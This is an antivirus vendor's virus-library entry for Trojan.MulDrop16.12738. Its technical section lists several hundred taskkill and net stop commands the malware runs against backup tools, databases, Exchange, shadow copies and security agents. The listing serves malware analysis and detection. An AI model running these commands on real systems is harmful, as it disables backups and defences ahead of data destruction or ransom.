FOR CUSTOMERS

Close

Library
My library

+ Add to library

Search
Search

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

A query form

Call us

+7 (495) 789-45-86

Forum

Your tickets

New ticket

Call us

+7 (495) 789-45-86

Profile

EN

RU CN DE EN ES FR IT JP KZ UZ PL BY ID
Close
Support services
Scanners
Dr.Web vxCube
Trial
VCI investigations
Virus library
Knowledge base

Technologies

Terminology

Training and education

Myths

News

Trojan.MulDrop16.12738

Added to the Dr.Web virus database: 2021-03-01

Virus description added:

Technical Information

Malicious functions
Executes the following
  • '<SYSTEM32>\taskkill.exe' /IM BackupExec.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VirtualBox.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-tray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlmangr.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM pvxiosvr.exe
  • '<SYSTEM32>\taskkill.exe' /IM vmtoolsd.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM "SqlBak.Service.exe" /F
  • '<SYSTEM32>\net.exe' stop "SQLBackupAndFTP Client Service"
  • '<SYSTEM32>\taskkill.exe' /F /IM VeeamDeploymentSvc.exe
  • '<SYSTEM32>\taskkill.exe' /IM SecureCRTPortable.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sshd.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mssearch.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM pvxcom.exe
  • '<SYSTEM32>\taskkill.exe' /IM ssms.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlceip.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "SAP Business One.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM beremote.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Guest.Interaction.Proxy.exe
  • '<SYSTEM32>\taskkill.exe' /IM SecureCRT.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM node.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RavTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM pvxwin64.exe
  • '<SYSTEM32>\taskkill.exe' /IM sqlbrowser.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "Cobian.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F
  • '<SYSTEM32>\taskkill.exe' /F /IM VeeamNFSSvc.exe
  • '<SYSTEM32>\net.exe' stop cbVSCService
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlbrowser.exe
  • '<SYSTEM32>\taskkill.exe' /IM VirtualBoxVM.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlwriter.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SyncBaseSvr.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Sage.NA.AT_AU.Service.exe
  • '<SYSTEM32>\taskkill.exe' /IM yundetectservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeMailboxReplication.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM VeeamTransportSvc.exe
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSVC.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM iempwatchdog.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msftesql.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM baidunetdisk.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.WmiServer.exe
  • '<SYSTEM32>\net.exe' stop SBOWorkflowEngine
  • '<SYSTEM32>\net.exe' stop SBOWFDataAccess
  • '<SYSTEM32>\net.exe' stop SBOMail
  • '<SYSTEM32>\taskkill.exe' /F /IM store.exe
  • '<SYSTEM32>\net.exe' stop SBOJobServiceBackEnd
  • '<SYSTEM32>\net.exe' stop SBODI_Server
  • '<SYSTEM32>\net.exe' stop SBOClientAgent
  • '<SYSTEM32>\net.exe' stop SAPB1iEventSender
  • '<SYSTEM32>\net.exe' stop "SAPB1iDIProxy_Monitor"
  • '<SYSTEM32>\net.exe' stop SAPB1iDIProxy
  • '<SYSTEM32>\net.exe' stop "SAP Business One RSP Agent Service"
  • '<SYSTEM32>\taskkill.exe' /IM bedbg.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM rdm.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.ProtectedServiceHost.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM "FileZilla Server.exe"
  • '<SYSTEM32>\taskkill.exe' /IM SqlManagement.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM bengine.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM MessageNotification.exe /F
  • '<SYSTEM32>\net.exe' stop UFNet
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.CloudService.exe
  • '<SYSTEM32>\taskkill.exe' /IM TeamViewer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-agent-daemon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM CCenter.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM fdhost.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Launchpad.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM tomcat9.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BackupExecManagementService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ServerNT.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.CatalogDataService.exe
  • '<SYSTEM32>\taskkill.exe' /IM TeamViewer_Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SogouImeBroker.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM licenceserver.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM java.exe /F
  • '<SYSTEM32>\net.exe' stop UTUService
  • '<SYSTEM32>\taskkill.exe' /IM UFSoft.U8.OC.QuartzScheduler.exe /F
  • '<SYSTEM32>\net.exe' stop UFReportService
  • '<SYSTEM32>\taskkill.exe' /IM ScanFrm.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM eSightService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM nginx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM beserver.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TongBackupSrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wampmanager.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM pvxwin32.exe
  • '<SYSTEM32>\taskkill.exe' /IM softmgrlite.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM UFMsgCenterService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM pvlsvr.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Service.exe
  • '<SYSTEM32>\taskkill.exe' /IM tv_x64.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wrapper.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RsTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM cbInterface.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM Sage.NA.AT_AU.SysTray.exe
  • '<SYSTEM32>\taskkill.exe' /IM RemoteAssistProcess.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mpdwsvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.MountService.exe
  • '<SYSTEM32>\taskkill.exe' /IM tv_w32.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM cygrunsrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM d_manage.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM cbService.exe
  • '<SYSTEM32>\taskkill.exe' /IM Veeam.Backup.Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM benetns.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM cbVSCService11.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Manager.exe
  • '<SYSTEM32>\taskkill.exe' /IM CasLicenceServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM cbService.exe /F
  • '<SYSTEM32>\net.exe' stop "ReportServer$OPTIMA"
  • '<SYSTEM32>\taskkill.exe' /IM ssclient.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM w3wp.exe
  • '<SYSTEM32>\taskkill.exe' /IM DumpServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.Search.ExSearch.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM mysqld.exe
  • '<SYSTEM32>\taskkill.exe' /IM dinotify.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM IDDAService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchange.NodeService.ein /F
  • '<SYSTEM32>\taskkill.exe' /IM DisklessServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM msexchangerepl.exe
  • '<SYSTEM32>\taskkill.exe' /IM Tencentdll.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM mysql.exe
  • '<SYSTEM32>\taskkill.exe' /IM His6Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AutoDealService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchangeService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ControlServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TXPlatform.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeMailboxAssistants.exe
  • '<SYSTEM32>\taskkill.exe' /F /IM msmdsrv.exe
  • '<SYSTEM32>\taskkill.exe' /IM fppdis5.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM UIODetect.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MsDtsSrvr.exe
  • '<SYSTEM32>\taskkill.exe' /IM BsAgent_0.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM perl.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM EnergyDataService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM JhTask.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.EdgeSyncSvc.exe
  • '<SYSTEM32>\taskkill.exe' /IM HaoZipScan.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GoogleCrashHandler.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Launchpad.exe
  • '<SYSTEM32>\taskkill.exe' /IM SoftMemory.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeTransport.exe
  • '<SYSTEM32>\taskkill.exe' /IM ap_nginx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TsServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM HaoZip.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DAService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM UFSoft.U8.OC.QuartzScheduler.exe
  • '<SYSTEM32>\taskkill.exe' /IM service_agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM WeChat.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM U8SmartClientMonitor.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM emagent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM QQ.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TransMain.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM SageCSClient.exe
  • '<SYSTEM32>\taskkill.exe' /IM PersonUDisk.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MsExchangeFDS.exe
  • '<SYSTEM32>\taskkill.exe' /IM Executer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM jenkins.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM MPService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM wsusservice.exe
  • '<SYSTEM32>\taskkill.exe' /IM NetDiskServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AllPassCBHost.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe
  • '<SYSTEM32>\taskkill.exe' /IM fdlauncher.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM PrivacyIconClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM DataCollectorSvc.exe
  • '<SYSTEM32>\taskkill.exe' /IM OPCClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ipc_proxy.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM igfxEM.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeTransportLogSearch.exe
  • '<SYSTEM32>\taskkill.exe' /IM BarCMService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlwriter.exe
  • '<SYSTEM32>\taskkill.exe' /IM SyncBaseConsole.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "phpStudy.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM sfupdatemgr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RAVCp164.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM EdgeTransport.exe
  • '<SYSTEM32>\taskkill.exe' /IM GoodGameSrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlservr.exe
  • '<SYSTEM32>\taskkill.exe' /IM "notepad++.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM TNSLSNR.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_monitor.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GNAupdaemon.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeThrottling.exe
  • '<SYSTEM32>\taskkill.exe' /IM BarMoniService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlceip.exe
  • '<SYSTEM32>\taskkill.exe' /IM abs_deployer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM php.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM sqlagentc.exe
  • '<SYSTEM32>\taskkill.exe' /IM igfxHK.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TsService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe
  • '<SYSTEM32>\taskkill.exe' /IM SOUNDMAN.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxMonitorService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM fdlauncher.exe
  • '<SYSTEM32>\taskkill.exe' /IM IcafeServicesTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.ServiceHost.exe
  • '<SYSTEM32>\taskkill.exe' /IM MySQLNotifier.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GNCEFExternal.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM fdhost.exe
  • '<SYSTEM32>\taskkill.exe' /IM SunloginClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sfavsvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BarServerView.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oravssw.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oracle.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM 360bdoctor.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Ssms.exe
  • '<SYSTEM32>\taskkill.exe' /IM SupportAssistAgent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_sec_plan.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GoodGame.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM ReportingServicesService.exe
  • '<SYSTEM32>\taskkill.exe' /IM igfxTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Microsoft.Exchange.AddressBook.Service.exe
  • '<SYSTEM32>\taskkill.exe' /IM AutoBackUpEx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM navicat.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM redis-server.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM aspnet_state.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mdm.exe /F
  • '<SYSTEM32>\net.exe' stop UFAllNet
  • '<SYSTEM32>\net.exe' stop U8WebPool
  • '<SYSTEM32>\net.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\net.exe' stop MSSQL$RE_EXPRESS
  • '<SYSTEM32>\net.exe' stop QPCore
  • '<SYSTEM32>\net.exe' stop Service2
  • '<SYSTEM32>\net.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\net.exe' stop "SQLAgent"
  • '<SYSTEM32>\net.exe' stop TeamViewer
  • '<SYSTEM32>\net.exe' stop JWService
  • '<SYSTEM32>\net.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\taskkill.exe' /IM mysqld-nt.exe /F
  • '<SYSTEM32>\net.exe' stop MSSQL$FE_EXPRESS
  • '<SYSTEM32>\net.exe' stop vmvss
  • '<SYSTEM32>\net.exe' stop "MSSQL"
  • '<SYSTEM32>\net.exe' stop Tomcat8
  • '<SYSTEM32>\net.exe' stop JWRinfoClientService
  • '<SYSTEM32>\net.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net.exe' stop "NetBackup SAN Client Fibre Transport Service"
  • '<SYSTEM32>\net.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\net.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\net.exe' stop "NetBackup Proxy Service"
  • '<SYSTEM32>\net.exe' stop "SQLAgent$VEEAMSQL2012"
  • '<SYSTEM32>\net.exe' stop SQLWriter
  • '<SYSTEM32>\net.exe' stop CASLicenceServer
  • '<SYSTEM32>\net.exe' stop SQLANYs_Sage_FAS_Fixed_Assets
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\net.exe' stop "ReportServer"
  • '<SYSTEM32>\net.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\net.exe' stop "SQLTELEMETRY$HL"
  • '<SYSTEM32>\net.exe' stop "AliyunService"
  • '<SYSTEM32>\net.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net.exe' stop "MSSQLSERVER"
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher"
  • '<SYSTEM32>\net.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\net.exe' stop VMnetDHCP
  • '<SYSTEM32>\net.exe' stop "NetBackup Client Service"
  • '<SYSTEM32>\net.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\net.exe' stop "MsDtsServer100"
  • '<SYSTEM32>\net.exe' stop MSSQL$VIM_SQLEXP
  • '<SYSTEM32>\net.exe' stop AutoUpdateService
  • '<SYSTEM32>\net.exe' stop AdobeARMservice
  • '<SYSTEM32>\net.exe' stop MSExchangeHM
  • '<SYSTEM32>\net.exe' stop "MSSQLServerOLAPService"
  • '<SYSTEM32>\net.exe' stop CASWebServer
  • '<SYSTEM32>\net.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\net.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\taskkill.exe' /IM AppMain.exe /F
  • '<SYSTEM32>\net.exe' stop CASXMLService
  • '<SYSTEM32>\net.exe' stop "NetBackup Legacy Network Service"
  • '<SYSTEM32>\net.exe' stop TeamViewer8
  • '<SYSTEM32>\net.exe' stop Realtek11nSU
  • '<SYSTEM32>\net.exe' stop "memcached Server"
  • '<SYSTEM32>\net.exe' stop MSSQL$
  • '<SYSTEM32>\net.exe' stop "MSSQL$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop VMwareHostd
  • '<SYSTEM32>\net.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net.exe' stop U8WorkerService2
  • '<SYSTEM32>\net.exe' stop "SQLBrowser"
  • '<SYSTEM32>\net.exe' stop "MSOLAP$SHOPCONTROL9"
  • '<SYSTEM32>\taskkill.exe' /IM DDSoftPwsTomcat9.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Tomcat7w.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlservr.exe /F
  • '<SYSTEM32>\net.exe' stop UIODetect
  • '<SYSTEM32>\taskkill.exe' /IM pg_ctl.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ThunderPlatform.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSDS.exe /F
  • '<SYSTEM32>\net.exe' stop HaoZipSvc
  • '<SYSTEM32>\net.exe' stop U8WorkerService1
  • '<SYSTEM32>\taskkill.exe' /IM ReportingServicesService.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Agent.ConfigurationService.exe
  • '<SYSTEM32>\net.exe' stop "SQLSERVERAGENT"
  • '<SYSTEM32>\net.exe' stop "SQLTELEMETRY"
  • '<SYSTEM32>\net.exe' stop Apache2.4
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop xenlite
  • '<SYSTEM32>\net.exe' stop "MSSQL$VEEAMSQL2012"
  • '<SYSTEM32>\net.exe' stop VMUSBArbService
  • '<SYSTEM32>\net.exe' stop "NetBackup Legacy Client Service"
  • '<SYSTEM32>\net.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\net.exe' stop DellDRLogSvc
  • '<SYSTEM32>\net.exe' stop mysqltransport
  • '<SYSTEM32>\net.exe' stop vss
  • '<SYSTEM32>\net.exe' stop "SQLWrite"
  • '<SYSTEM32>\net.exe' stop "NetBackup Discovery Framework"
  • '<SYSTEM32>\net.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net.exe' stop WebAttendServer
  • '<SYSTEM32>\net.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net.exe' stop Apache2.2
  • '<SYSTEM32>\net.exe' stop wanxiao-monitor
  • '<SYSTEM32>\net.exe' stop "SSISTELEMETRY130"
  • '<SYSTEM32>\net.exe' stop "SQLAgent$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop UFIDAWebService
  • '<SYSTEM32>\net.exe' stop XenSvc
  • '<SYSTEM32>\net.exe' stop VMAuthdService
  • '<SYSTEM32>\net.exe' stop SQLSERVERAGENT
  • '<SYSTEM32>\net.exe' stop "MsDtsServer130"
  • '<SYSTEM32>\net.exe' stop "ReportServer$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop SQLBrowser
  • '<SYSTEM32>\taskkill.exe' /F /IM MSExchangeMailSubmission.exe
  • '<SYSTEM32>\net.exe' stop "TMBMServer"
  • '<SYSTEM32>\net.exe' stop AGSService
  • '<SYSTEM32>\net.exe' stop "Apple Mobile Device Service"
  • '<SYSTEM32>\net.exe' stop "Bonjour Service"
  • '<SYSTEM32>\net.exe' stop GNWebService
  • '<SYSTEM32>\net.exe' stop U8SendMailAdmin
  • '<SYSTEM32>\net.exe' stop CobianBackup10
  • '<SYSTEM32>\net.exe' stop pcas
  • '<SYSTEM32>\net.exe' stop RTCAVMCU
  • '<SYSTEM32>\net.exe' stop KugouService
  • '<SYSTEM32>\net.exe' stop NFVPrintServer
  • '<SYSTEM32>\net.exe' stop ceng_web_svc_d
  • '<SYSTEM32>\net.exe' stop K3ClouManager
  • '<SYSTEM32>\net.exe' stop KpService
  • '<SYSTEM32>\net.exe' stop EvtSys
  • '<SYSTEM32>\net.exe' stop K3MMainSuspendService
  • '<SYSTEM32>\net.exe' stop IngressMgr
  • '<SYSTEM32>\net.exe' stop DFServ
  • '<SYSTEM32>\net.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net.exe' stop RavService
  • '<SYSTEM32>\net.exe' stop OMAILREPORT
  • '<SYSTEM32>\net.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net.exe' stop NFLicenceServer
  • '<SYSTEM32>\net.exe' stop Mysoft.SchedulingService
  • '<SYSTEM32>\net.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
  • '<SYSTEM32>\net.exe' stop AgentX
  • '<SYSTEM32>\net.exe' stop SentinelKeysServer
  • '<SYSTEM32>\net.exe' stop d_safe
  • '<SYSTEM32>\net.exe' stop U8TaskService
  • '<SYSTEM32>\net.exe' stop U8SLReportService
  • '<SYSTEM32>\net.exe' stop U8SCMPool
  • '<SYSTEM32>\net.exe' stop U8MPool
  • '<SYSTEM32>\taskkill.exe' /IM U8CEServer.exe /F
  • '<SYSTEM32>\net.exe' stop U8KeyManagePool
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.BrokerService.exe
  • '<SYSTEM32>\taskkill.exe' /IM mysqld.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM iexplore.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM rcrelay.exe /F
  • '<SYSTEM32>\net.exe' stop ImtsEventSvr
  • '<SYSTEM32>\taskkill.exe' /IM httpd.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeIS
  • '<SYSTEM32>\taskkill.exe' /IM Att.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM NFVPrint.exe /F
  • '<SYSTEM32>\net.exe' stop U8GCService
  • '<SYSTEM32>\net.exe' stop U8EncryptService
  • '<SYSTEM32>\net.exe' stop U8EISService
  • '<SYSTEM32>\net.exe' stop NFOTPService
  • '<SYSTEM32>\net.exe' stop U8DispatchService
  • '<SYSTEM32>\net.exe' stop NFSysService
  • '<SYSTEM32>\net.exe' stop TurboCRM70
  • '<SYSTEM32>\net.exe' stop DGPNPSEV
  • '<SYSTEM32>\taskkill.exe' /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\taskkill.exe' /IM U8SmartClient.exe /F
  • '<SYSTEM32>\net.exe' stop "MSSQLServerADHelper100"
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher$OPTIMA"
  • '<SYSTEM32>\net.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeRepl
  • '<SYSTEM32>\net.exe' stop CASMsgSrv
  • '<SYSTEM32>\net.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\net.exe' stop "SQLAgent$WOLTERSKLUWER"
  • '<SYSTEM32>\net.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\net.exe' stop MSExchangePop3
  • '<SYSTEM32>\net.exe' stop "SQLAgent$PROGID"
  • '<SYSTEM32>\net.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\net.exe' stop "MSSQL$WOLTERSKLUWER"
  • '<SYSTEM32>\net.exe' stop DDNSService
  • '<SYSTEM32>\net.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\net.exe' stop RapService
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net.exe' stop "MSSQL$PROGID"
  • '<SYSTEM32>\net.exe' stop MSExchangeRPC
  • '<SYSTEM32>\net.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net.exe' stop "MSSQL$OPTIMA"
  • '<SYSTEM32>\net.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\net.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net.exe' stop RavTask
  • '<SYSTEM32>\net.exe' stop MSExchangeUM
  • '<SYSTEM32>\net.exe' stop "postgresql-x64-9.4"
  • '<SYSTEM32>\net.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net.exe' stop ClickToRunSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\net.exe' stop "msftesql$SQLEXPRESS"
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\net.exe' stop MySQL5_OA
  • '<SYSTEM32>\net.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net.exe' stop AngelOfDeath
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net.exe' stop ServiceMid
